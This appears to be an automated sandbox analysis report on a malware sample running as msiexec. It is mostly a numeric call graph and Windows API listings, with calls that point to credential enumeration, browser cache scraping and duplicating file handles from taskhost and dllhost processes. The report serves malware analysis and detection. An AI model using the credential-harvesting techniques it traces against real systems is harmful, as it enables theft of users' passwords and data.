40b2cc 27 API calls 38457->38464 38458->38344 38458->38345 38460 409d1f 6 API calls 38459->38460 38465 445e47 38460->38465 38466 40b2cc 27 API calls 38461->38466 38467 40b2cc 27 API calls 38462->38467 38469 445c53 38464->38469 38901 409b98 GetFileAttributesW 38465->38901 38471 445f73 38466->38471 38467->38442 38468 409c70 2 API calls 38472 44577e 38468->38472 38473 409d1f 6 API calls 38469->38473 38475 409d1f 6 API calls 38471->38475 38477 409c70 2 API calls 38472->38477 38478 445c67 38473->38478 38474 445e56 38474->38446 38482 445e83 memset 38474->38482 38479 445f87 38475->38479 38476->38442 38480 44578d 38477->38480 38481 445389 255 API calls 38478->38481 38905 409b98 GetFileAttributesW 38479->38905 38480->38450 38487 40b2cc 27 API calls 38480->38487 38481->38344 38486 40b2cc 27 API calls 38482->38486 38485->38361 38485->38430 38488 445eab 38486->38488 38489 4457a8 38487->38489 38490 409d1f 6 API calls 38488->38490 38491 409d1f 6 API calls 38489->38491 38492 445ebf 38490->38492 38493 4457b8 38491->38493 38494 40ae18 9 API calls 38492->38494 38799 409b98 GetFileAttributesW 38493->38799 38504 445ef5 38494->38504 38496 4457c7 38496->38450 38497 4087b3 337 API calls 38496->38497 38497->38450 38498 40ae51 9 API calls 38498->38504 38499 445f5c 38500 40aebe FindClose 38499->38500 38500->38461 38501 40add4 2 API calls 38501->38504 38502 40b2cc 27 API calls 38502->38504 38503 409d1f 6 API calls 38503->38504 38504->38498 38504->38499 38504->38501 38504->38502 38504->38503 38506 445f3a 38504->38506 38903 409b98 GetFileAttributesW 38504->38903 38904 445093 23 API calls 38506->38904 38508->38308 38509->38311 38510->38308 38511->38303 38513 40c775 38512->38513 38906 40b1ab free free 38513->38906 38515 40c788 38907 40b1ab free free 38515->38907 38517 40c790 38908 40b1ab free free 38517->38908 38519 40c798 38520 40aa04 free 38519->38520 38521 40c7a0 38520->38521 38909 40c274 memset 38521->38909 38526 40a8ab 9 API calls 38527 40c7c3 38526->38527 38528 40a8ab 9 API calls 
38527->38528 38529 40c7d0 38528->38529 38938 40c3c3 38529->38938 38533 40c7e5 38534 40c877 38533->38534 38535 40c86c 38533->38535 38961 40a706 wcslen memcpy 38533->38961 38963 40c634 49 API calls 38533->38963 38542 40bdb0 38534->38542 38964 4053fe 39 API calls 38535->38964 38538 40c813 _wcslwr 38962 40c634 49 API calls 38538->38962 38540 40c829 wcslen 38540->38533 39149 404363 38542->39149 38545 40bf5d 39169 40440c 38545->39169 38547 40bdee 38547->38545 38550 40b2cc 27 API calls 38547->38550 38548 40bddf CredEnumerateW 38548->38547 38551 40be02 wcslen 38550->38551 38551->38545 38558 40be1e 38551->38558 38552 40be26 wcsncmp 38552->38558 38555 40be7d memset 38556 40bea7 memcpy 38555->38556 38555->38558 38557 40bf11 wcschr 38556->38557 38556->38558 38557->38558 38558->38545 38558->38552 38558->38555 38558->38556 38558->38557 38559 40b2cc 27 API calls 38558->38559 38561 40bf43 LocalFree 38558->38561 39172 40bd5d 28 API calls 38558->39172 39173 404423 38558->39173 38560 40bef6 _wcsnicmp 38559->38560 38560->38557 38560->38558 38561->38558 38562 4135f7 39186 4135e0 38562->39186 38565 40b2cc 27 API calls 38566 41360d 38565->38566 38567 40a804 8 API calls 38566->38567 38568 413613 38567->38568 38569 41361b 38568->38569 38570 41363e 38568->38570 38572 40b273 27 API calls 38569->38572 38571 4135e0 FreeLibrary 38570->38571 38573 413643 38571->38573 38574 413625 GetProcAddress 38572->38574 38573->38335 38574->38570 38575 413648 38574->38575 38576 413658 38575->38576 38577 4135e0 FreeLibrary 38575->38577 38576->38335 38578 413666 38577->38578 38578->38335 39189 4449b9 38579->39189 38582 444c1f 38582->38315 38583 4449b9 42 API calls 38585 444b4b 38583->38585 38584 444c15 38586 4449b9 42 API calls 38584->38586 38585->38584 39210 444972 GetVersionExW 38585->39210 38586->38582 38588 444b99 memcmp 38593 444b8c 38588->38593 38589 444c0b 39214 444a85 42 API calls 38589->39214 38593->38588 38593->38589 39211 444aa5 42 API calls 38593->39211 39212 40a7a0 GetVersionExW 38593->39212 39213 
444a85 42 API calls 38593->39213 38596 40399d 38595->38596 39215 403a16 38596->39215 38598 403a09 39229 40b1ab free free 38598->39229 38600 4039a3 38600->38598 38604 4039f4 38600->38604 39226 40a02c CreateFileW 38600->39226 38601 403a12 wcsrchr 38601->38322 38604->38598 38605 4099c6 2 API calls 38604->38605 38605->38598 38607 414c2e 14 API calls 38606->38607 38608 404048 38607->38608 38609 414c2e 14 API calls 38608->38609 38610 404056 38609->38610 38611 409d1f 6 API calls 38610->38611 38612 404073 38611->38612 38613 409d1f 6 API calls 38612->38613 38614 40408e 38613->38614 38615 409d1f 6 API calls 38614->38615 38616 4040a6 38615->38616 38617 403af5 20 API calls 38616->38617 38618 4040ba 38617->38618 38619 403af5 20 API calls 38618->38619 38620 4040cb 38619->38620 39256 40414f memset 38620->39256 38622 4040e0 38623 404140 38622->38623 38625 4040ec memset 38622->38625 38627 4099c6 2 API calls 38622->38627 38628 40a8ab 9 API calls 38622->38628 39270 40b1ab free free 38623->39270 38625->38622 38626 404148 38626->38382 38627->38622 38628->38622 39283 40a6e6 WideCharToMultiByte 38629->39283 38631 4087ed 39284 4095d9 memset 38631->39284 38634 408809 memset memset memset memset memset 38635 40b2cc 27 API calls 38634->38635 38636 4088a1 38635->38636 38637 409d1f 6 API calls 38636->38637 38638 4088b1 38637->38638 38639 40b2cc 27 API calls 38638->38639 38640 4088c0 38639->38640 38641 409d1f 6 API calls 38640->38641 38642 4088d0 38641->38642 38643 40b2cc 27 API calls 38642->38643 38644 4088df 38643->38644 38645 409d1f 6 API calls 38644->38645 38646 4088ef 38645->38646 38647 40b2cc 27 API calls 38646->38647 38648 4088fe 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 40890e 38649->38650 38651 40b2cc 27 API calls 38650->38651 38652 40891d 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 40892d 38653->38654 39303 409b98 GetFileAttributesW 38654->39303 38656 40893e 38657 408943 38656->38657 38658 408958 38656->38658 39304 407fdf 75 API calls 38657->39304 39305 
409b98 GetFileAttributesW 38658->39305 38661 408964 38662 408969 38661->38662 38663 40897b 38661->38663 39306 4082c7 198 API calls 38662->39306 39307 409b98 GetFileAttributesW 38663->39307 38666 408987 38667 4089a1 38666->38667 38668 40898c 38666->38668 39309 409b98 GetFileAttributesW 38667->39309 39308 408560 29 API calls 38668->39308 38678 408953 38678->38382 38681 40b633 free 38680->38681 38682 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38681->38682 38683 413f00 Process32NextW 38682->38683 38684 413da5 OpenProcess 38683->38684 38685 413f17 CloseHandle 38683->38685 38686 413df3 memset 38684->38686 38690 413eb0 38684->38690 38685->38425 39573 413f27 38686->39573 38688 413ec8 38688->38690 39600 4099f4 malloc memcpy free 38688->39600 38689 413ebf free 38689->38690 38690->38683 38690->38688 38690->38689 38692 413e37 GetModuleHandleW 38694 413e46 GetProcAddress 38692->38694 38695 413e1f 38692->38695 38694->38695 38695->38692 39578 413959 38695->39578 39594 413ca4 38695->39594 38697 413ea2 CloseHandle 38697->38690 38699 414c2e 14 API calls 38698->38699 38700 403eb7 38699->38700 38701 414c2e 14 API calls 38700->38701 38702 403ec5 38701->38702 38703 409d1f 6 API calls 38702->38703 38704 403ee2 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 403efd 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403f15 38707->38708 38709 403af5 20 API calls 38708->38709 38710 403f29 38709->38710 38711 403af5 20 API calls 38710->38711 38712 403f3a 38711->38712 38713 40414f 33 API calls 38712->38713 38714 403f4f 38713->38714 38715 403faf 38714->38715 38717 403f5b memset 38714->38717 38719 4099c6 2 API calls 38714->38719 38720 40a8ab 9 API calls 38714->38720 39609 40b1ab free free 38715->39609 38717->38714 38718 403fb7 38718->38364 38719->38714 38720->38714 38722 414c2e 14 API calls 38721->38722 38723 403d26 38722->38723 38724 414c2e 14 API calls 38723->38724 38725 403d34 38724->38725 38726 409d1f 6 API calls 38725->38726 38727 403d51 38726->38727 38728 409d1f 6 
API calls 38727->38728 38729 403d6c 38728->38729 38730 409d1f 6 API calls 38729->38730 38731 403d84 38730->38731 38732 403af5 20 API calls 38731->38732 38733 403d98 38732->38733 38734 403af5 20 API calls 38733->38734 38735 403da9 38734->38735 38736 40414f 33 API calls 38735->38736 38742 403dbe 38736->38742 38737 403e1e 39610 40b1ab free free 38737->39610 38738 403dca memset 38738->38742 38740 403e26 38740->38379 38741 4099c6 2 API calls 38741->38742 38742->38737 38742->38738 38742->38741 38743 40a8ab 9 API calls 38742->38743 38743->38742 38745 414b81 9 API calls 38744->38745 38746 414c40 38745->38746 38747 414c73 memset 38746->38747 39611 409cea 38746->39611 38751 414c94 38747->38751 38750 414c64 38750->38358 38752 414cf4 wcscpy 38751->38752 39614 414bb0 wcscpy 38751->39614 38752->38750 38754 414cd2 39615 4145ac RegQueryValueExW 38754->39615 38756 414ce9 38756->38752 38758 409d43 wcscpy 38757->38758 38760 409d62 38757->38760 38759 409719 2 API calls 38758->38759 38761 409d51 wcscat 38759->38761 38760->38402 38761->38760 38763 40aebe FindClose 38762->38763 38764 40ae21 38763->38764 38765 4099c6 2 API calls 38764->38765 38766 40ae35 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 40ae49 38767->38768 38768->38442 38770 40ade0 38769->38770 38771 40ae0f 38769->38771 38770->38771 38772 40ade7 wcscmp 38770->38772 38771->38442 38772->38771 38773 40adfe wcscmp 38772->38773 38773->38771 38775 40ae18 9 API calls 38774->38775 38777 4453c4 38775->38777 38776 40ae51 9 API calls 38776->38777 38777->38776 38778 4453f3 38777->38778 38779 40add4 2 API calls 38777->38779 38782 445403 250 API calls 38777->38782 38780 40aebe FindClose 38778->38780 38779->38777 38781 4453fe 38780->38781 38781->38442 38782->38777 38784 40ae7b FindNextFileW 38783->38784 38785 40ae5c FindFirstFileW 38783->38785 38786 40ae94 38784->38786 38787 40ae8f 38784->38787 38785->38786 38789 40aeb6 38786->38789 38790 409d1f 6 API calls 38786->38790 38788 40aebe FindClose 38787->38788 38788->38786 
38789->38442 38790->38789 38791->38354 38792->38334 38793->38428 38794->38411 38795->38411 38796->38443 38798 409c89 38797->38798 38798->38468 38799->38496 38801 413d39 38800->38801 38802 413d2f FreeLibrary 38800->38802 38803 40b633 free 38801->38803 38802->38801 38804 413d42 38803->38804 38805 40b633 free 38804->38805 38806 413d4a 38805->38806 38806->38324 38807->38327 38808->38371 38809->38394 38811 44db70 38810->38811 38812 40b6fc memset 38811->38812 38813 409c70 2 API calls 38812->38813 38814 40b732 wcsrchr 38813->38814 38815 40b743 38814->38815 38816 40b746 memset 38814->38816 38815->38816 38817 40b2cc 27 API calls 38816->38817 38818 40b76f 38817->38818 38819 409d1f 6 API calls 38818->38819 38820 40b783 38819->38820 39616 409b98 GetFileAttributesW 38820->39616 38822 40b792 38823 40b7c2 38822->38823 38825 409c70 2 API calls 38822->38825 39617 40bb98 38823->39617 38827 40b7a5 38825->38827 38830 40b2cc 27 API calls 38827->38830 38828 40b837 CloseHandle 38833 40b83e memset 38828->38833 38829 40b817 39651 409a45 GetTempPathW 38829->39651 38831 40b7b2 38830->38831 38834 409d1f 6 API calls 38831->38834 39650 40a6e6 WideCharToMultiByte 38833->39650 38834->38823 38835 40b827 38835->38833 38837 40b866 38838 444432 120 API calls 38837->38838 38839 40b879 38838->38839 38840 40b273 27 API calls 38839->38840 38841 40bad5 38839->38841 38842 40b89a 38840->38842 38843 40b04b ??3@YAXPAX 38841->38843 38844 438552 133 API calls 38842->38844 38845 40baf3 38843->38845 38846 40b8a4 38844->38846 38845->38405 38847 40bacd 38846->38847 38849 4251c4 136 API calls 38846->38849 38848 443d90 110 API calls 38847->38848 38848->38841 38872 40b8b8 38849->38872 38850 40bac6 39663 424f26 122 API calls 38850->39663 38851 40b8bd memset 39654 425413 17 API calls 38851->39654 38854 425413 17 API calls 38854->38872 38857 40a71b MultiByteToWideChar 38857->38872 38858 40a734 MultiByteToWideChar 38858->38872 38861 40b9b5 memcmp 38861->38872 38862 4099c6 2 API calls 38862->38872 38863 404423 37 API calls 
38863->38872 38866 4251c4 136 API calls 38866->38872 38867 40bb3e memset memcpy 39664 40a734 MultiByteToWideChar 38867->39664 38869 40bb88 LocalFree 38869->38872 38872->38850 38872->38851 38872->38854 38872->38857 38872->38858 38872->38861 38872->38862 38872->38863 38872->38866 38872->38867 38873 40ba5f memcmp 38872->38873 39655 4253ef 16 API calls 38872->39655 39656 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38872->39656 39657 4253af 17 API calls 38872->39657 39658 4253cf 17 API calls 38872->39658 39659 447280 memset 38872->39659 39660 447960 memset memcpy memcpy memcpy 38872->39660 39661 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38872->39661 39662 447920 memcpy memcpy memcpy 38872->39662 38873->38872 38874->38407 38876 40aed1 38875->38876 38877 40aec7 FindClose 38875->38877 38876->38458 38877->38876 38879 4099d7 38878->38879 38880 4099da memcpy 38878->38880 38879->38880 38880->38381 38882 40b2cc 27 API calls 38881->38882 38883 44543f 38882->38883 38884 409d1f 6 API calls 38883->38884 38885 44544f 38884->38885 39753 409b98 GetFileAttributesW 38885->39753 38887 44545e 38888 445476 38887->38888 38890 40b6ef 249 API calls 38887->38890 38889 40b2cc 27 API calls 38888->38889 38891 445482 38889->38891 38890->38888 38892 409d1f 6 API calls 38891->38892 38893 445492 38892->38893 39754 409b98 GetFileAttributesW 38893->39754 38895 4454a1 38896 4454b9 38895->38896 38897 40b6ef 249 API calls 38895->38897 38896->38409 38897->38896 38898->38408 38899->38433 38900->38439 38901->38474 38902->38455 38903->38504 38904->38504 38905->38485 38906->38515 38907->38517 38908->38519 38910 414c2e 14 API calls 38909->38910 38911 40c2ae 38910->38911 38965 40c1d3 38911->38965 38916 40c3be 38933 40a8ab 38916->38933 38917 40afcf 2 API calls 38918 40c2fd FindFirstUrlCacheEntryW 38917->38918 38919 40c3b6 38918->38919 38920 40c31e wcschr 38918->38920 38921 40b04b ??3@YAXPAX 38919->38921 38922 40c331 38920->38922 38923 40c35e FindNextUrlCacheEntryW 38920->38923 38921->38916 38925 40a8ab 9 API 
calls 38922->38925 38923->38920 38924 40c373 GetLastError 38923->38924 38926 40c3ad FindCloseUrlCache 38924->38926 38927 40c37e 38924->38927 38928 40c33e wcschr 38925->38928 38926->38919 38929 40afcf 2 API calls 38927->38929 38928->38923 38930 40c34f 38928->38930 38931 40c391 FindNextUrlCacheEntryW 38929->38931 38932 40a8ab 9 API calls 38930->38932 38931->38920 38931->38926 38932->38923 39081 40a97a 38933->39081 38936 40a8cc 38936->38526 39087 40b1ab free free 38938->39087 38940 40c3dd 38941 40b2cc 27 API calls 38940->38941 38942 40c3e7 38941->38942 38943 40c50e 38942->38943 38944 40c3ff 38942->38944 38958 405337 38943->38958 38945 40a9ce 4 API calls 38944->38945 38946 40c418 memset 38945->38946 39088 40aa1d 38946->39088 38949 40c471 38951 40c47a _wcsupr 38949->38951 38950 40c505 38950->38943 39090 40a8d0 7 API calls 38951->39090 38953 40c498 39091 40a8d0 7 API calls 38953->39091 38955 40c4ac memset 38956 40aa1d 38955->38956 38957 40c4e4 RegEnumValueW 38956->38957 38957->38950 38957->38951 39092 405220 38958->39092 38961->38538 38962->38540 38963->38533 38964->38534 38966 40ae18 9 API calls 38965->38966 38972 40c210 38966->38972 38967 40ae51 9 API calls 38967->38972 38968 40c264 38969 40aebe FindClose 38968->38969 38971 40c26f 38969->38971 38970 40add4 2 API calls 38970->38972 38977 40e5ed memset memset 38971->38977 38972->38967 38972->38968 38972->38970 38973 40c231 _wcsicmp 38972->38973 38974 40c1d3 34 API calls 38972->38974 38973->38972 38975 40c248 38973->38975 38974->38972 38990 40c084 21 API calls 38975->38990 38978 414c2e 14 API calls 38977->38978 38979 40e63f 38978->38979 38980 409d1f 6 API calls 38979->38980 38981 40e658 38980->38981 38991 409b98 GetFileAttributesW 38981->38991 38983 40e667 38984 409d1f 6 API calls 38983->38984 38986 40e680 38983->38986 38984->38986 38992 409b98 GetFileAttributesW 38986->38992 38987 40e68f 38988 40c2d8 38987->38988 38993 40e4b2 38987->38993 38988->38916 38988->38917 38990->38972 38991->38983 38992->38987 39014 40e01e 
38993->39014 38995 40e593 38996 40e5b0 38995->38996 38997 40e59c DeleteFileW 38995->38997 38998 40b04b ??3@YAXPAX 38996->38998 38997->38996 39000 40e5bb 38998->39000 38999 40e521 38999->38995 39037 40e175 38999->39037 39002 40e5c4 CloseHandle 39000->39002 39003 40e5cc 39000->39003 39002->39003 39005 40b633 free 39003->39005 39004 40e573 39007 40e584 39004->39007 39008 40e57c CloseHandle 39004->39008 39006 40e5db 39005->39006 39010 40b633 free 39006->39010 39080 40b1ab free free 39007->39080 39008->39007 39009 40e540 39009->39004 39057 40e2ab 39009->39057 39012 40e5e3 39010->39012 39012->38988 39015 406214 22 API calls 39014->39015 39016 40e03c 39015->39016 39017 40e16b 39016->39017 39018 40dd85 74 API calls 39016->39018 39017->38999 39019 40e06b 39018->39019 39019->39017 39020 40afcf ??2@YAPAXI ??3@YAXPAX 39019->39020 39021 40e08d OpenProcess 39020->39021 39022 40e0a4 GetCurrentProcess DuplicateHandle 39021->39022 39026 40e152 39021->39026 39023 40e0d0 GetFileSize 39022->39023 39024 40e14a CloseHandle 39022->39024 39027 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39023->39027 39024->39026 39025 40e160 39029 40b04b ??3@YAXPAX 39025->39029 39026->39025 39028 406214 22 API calls 39026->39028 39030 40e0ea 39027->39030 39028->39025 39029->39017 39031 4096dc CreateFileW 39030->39031 39032 40e0f1 CreateFileMappingW 39031->39032 39033 40e140 CloseHandle CloseHandle 39032->39033 39034 40e10b MapViewOfFile 39032->39034 39033->39024 39035 40e13b CloseHandle 39034->39035 39036 40e11f WriteFile UnmapViewOfFile 39034->39036 39035->39033 39036->39035 39038 40e18c 39037->39038 39039 406b90 11 API calls 39038->39039 39040 40e19f 39039->39040 39041 40e1a7 memset 39040->39041 39042 40e299 39040->39042 39047 40e1e8 39041->39047 39043 4069a3 ??3@YAXPAX free 39042->39043 39044 40e2a4 39043->39044 39044->39009 39045 406e8f 13 API calls 39045->39047 39046 406b53 SetFilePointerEx ReadFile 39046->39047 39047->39045 39047->39046 39048 40dd50 _wcsicmp 39047->39048 39049 40e283 
39047->39049 39053 40742e 8 API calls 39047->39053 39054 40aae3 wcslen wcslen _memicmp 39047->39054 39055 40e244 _snwprintf 39047->39055 39048->39047 39050 40e291 39049->39050 39051 40e288 free 39049->39051 39052 40aa04 free 39050->39052 39051->39050 39052->39042 39053->39047 39054->39047 39056 40a8d0 7 API calls 39055->39056 39056->39047 39058 40e2c2 39057->39058 39059 406b90 11 API calls 39058->39059 39070 40e2d3 39059->39070 39060 40e4a0 39061 4069a3 ??3@YAXPAX free 39060->39061 39063 40e4ab 39061->39063 39062 406e8f 13 API calls 39062->39070 39063->39009 39064 406b53 SetFilePointerEx ReadFile 39064->39070 39065 40e489 39066 40aa04 free 39065->39066 39067 40e491 39066->39067 39067->39060 39069 40e497 free 39067->39069 39068 40dd50 _wcsicmp 39068->39070 39069->39060 39070->39060 39070->39062 39070->39064 39070->39065 39070->39068 39071 40dd50 _wcsicmp 39070->39071 39074 40742e 8 API calls 39070->39074 39075 40e3e0 memcpy 39070->39075 39076 40e3fb memcpy 39070->39076 39077 40e3b3 wcschr 39070->39077 39078 40e416 memcpy 39070->39078 39079 40e431 memcpy 39070->39079 39072 40e376 memset 39071->39072 39073 40aa29 6 API calls 39072->39073 39073->39070 39074->39070 39075->39070 39076->39070 39077->39070 39078->39070 39079->39070 39080->38995 39082 40a980 39081->39082 39083 40a995 _wcsicmp 39082->39083 39084 40a99c wcscmp 39082->39084 39085 40a8bb 39082->39085 39083->39082 39084->39082 39085->38936 39086 40a8d0 7 API calls 39085->39086 39086->38936 39087->38940 39089 40aa23 RegEnumValueW 39088->39089 39089->38949 39089->38950 39090->38953 39091->38955 39093 405335 39092->39093 39094 40522a 39092->39094 39093->38533 39095 40b2cc 27 API calls 39094->39095 39096 405234 39095->39096 39097 40a804 8 API calls 39096->39097 39098 40523a 39097->39098 39137 40b273 39098->39137 39100 405248 _mbscpy _mbscat GetProcAddress 39101 40b273 27 API calls 39100->39101 39102 405279 39101->39102 39140 405211 GetProcAddress 39102->39140 39104 405282 39105 40b273 27 API calls 39104->39105 39106 
40528f 39105->39106 39141 405211 GetProcAddress 39106->39141 39108 405298 39109 40b273 27 API calls 39108->39109 39110 4052a5 39109->39110 39142 405211 GetProcAddress 39110->39142 39112 4052ae 39113 40b273 27 API calls 39112->39113 39114 4052bb 39113->39114 39143 405211 GetProcAddress 39114->39143 39116 4052c4 39117 40b273 27 API calls 39116->39117 39118 4052d1 39117->39118 39144 405211 GetProcAddress 39118->39144 39120 4052da 39121 40b273 27 API calls 39120->39121 39122 4052e7 39121->39122 39145 405211 GetProcAddress 39122->39145 39124 4052f0 39125 40b273 27 API calls 39124->39125 39126 4052fd 39125->39126 39146 405211 GetProcAddress 39126->39146 39128 405306 39129 40b273 27 API calls 39128->39129 39130 405313 39129->39130 39147 405211 GetProcAddress 39130->39147 39132 40531c 39133 40b273 27 API calls 39132->39133 39134 405329 39133->39134 39148 405211 GetProcAddress 39134->39148 39136 405332 39136->39093 39138 40b58d 27 API calls 39137->39138 39139 40b18c 39138->39139 39139->39100 39140->39104 39141->39108 39142->39112 39143->39116 39144->39120 39145->39124 39146->39128 39147->39132 39148->39136 39150 40440c FreeLibrary 39149->39150 39151 40436d 39150->39151 39152 40a804 8 API calls 39151->39152 39153 404377 39152->39153 39154 404383 39153->39154 39155 404405 39153->39155 39156 40b273 27 API calls 39154->39156 39155->38545 39155->38547 39155->38548 39157 40438d GetProcAddress 39156->39157 39158 40b273 27 API calls 39157->39158 39159 4043a7 GetProcAddress 39158->39159 39160 40b273 27 API calls 39159->39160 39161 4043ba GetProcAddress 39160->39161 39162 40b273 27 API calls 39161->39162 39163 4043ce GetProcAddress 39162->39163 39164 40b273 27 API calls 39163->39164 39165 4043e2 GetProcAddress 39164->39165 39166 4043f1 39165->39166 39167 4043f7 39166->39167 39168 40440c FreeLibrary 39166->39168 39167->39155 39168->39155 39170 404413 FreeLibrary 39169->39170 39171 40441e 39169->39171 39170->39171 39171->38562 39172->38558 39174 40447e 39173->39174 39175 40442e 
                                                                                        Control-flow Graph

                                                                                        control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040DDAD
                                                                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                          • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                          • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                        • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                        • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                        • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                        • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                        • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                        • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                        • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                        • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                        • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                        • memset.MSVCRT ref: 0040DF5F
                                                                                        • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                        • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                        • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                        • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                        • API String ID: 708747863-3398334509
                                                                                        • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                        • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                        • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                        • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                        • memset.MSVCRT ref: 00413D7F
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                        • memset.MSVCRT ref: 00413E07
                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                        • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                        • free.MSVCRT ref: 00413EC1
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                        • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                        • API String ID: 1344430650-1740548384
                                                                                        • Opcode ID: 0a5514244f8da3553e93fddd8650c41e468bd34edf4168a604947191dfb6c3d8
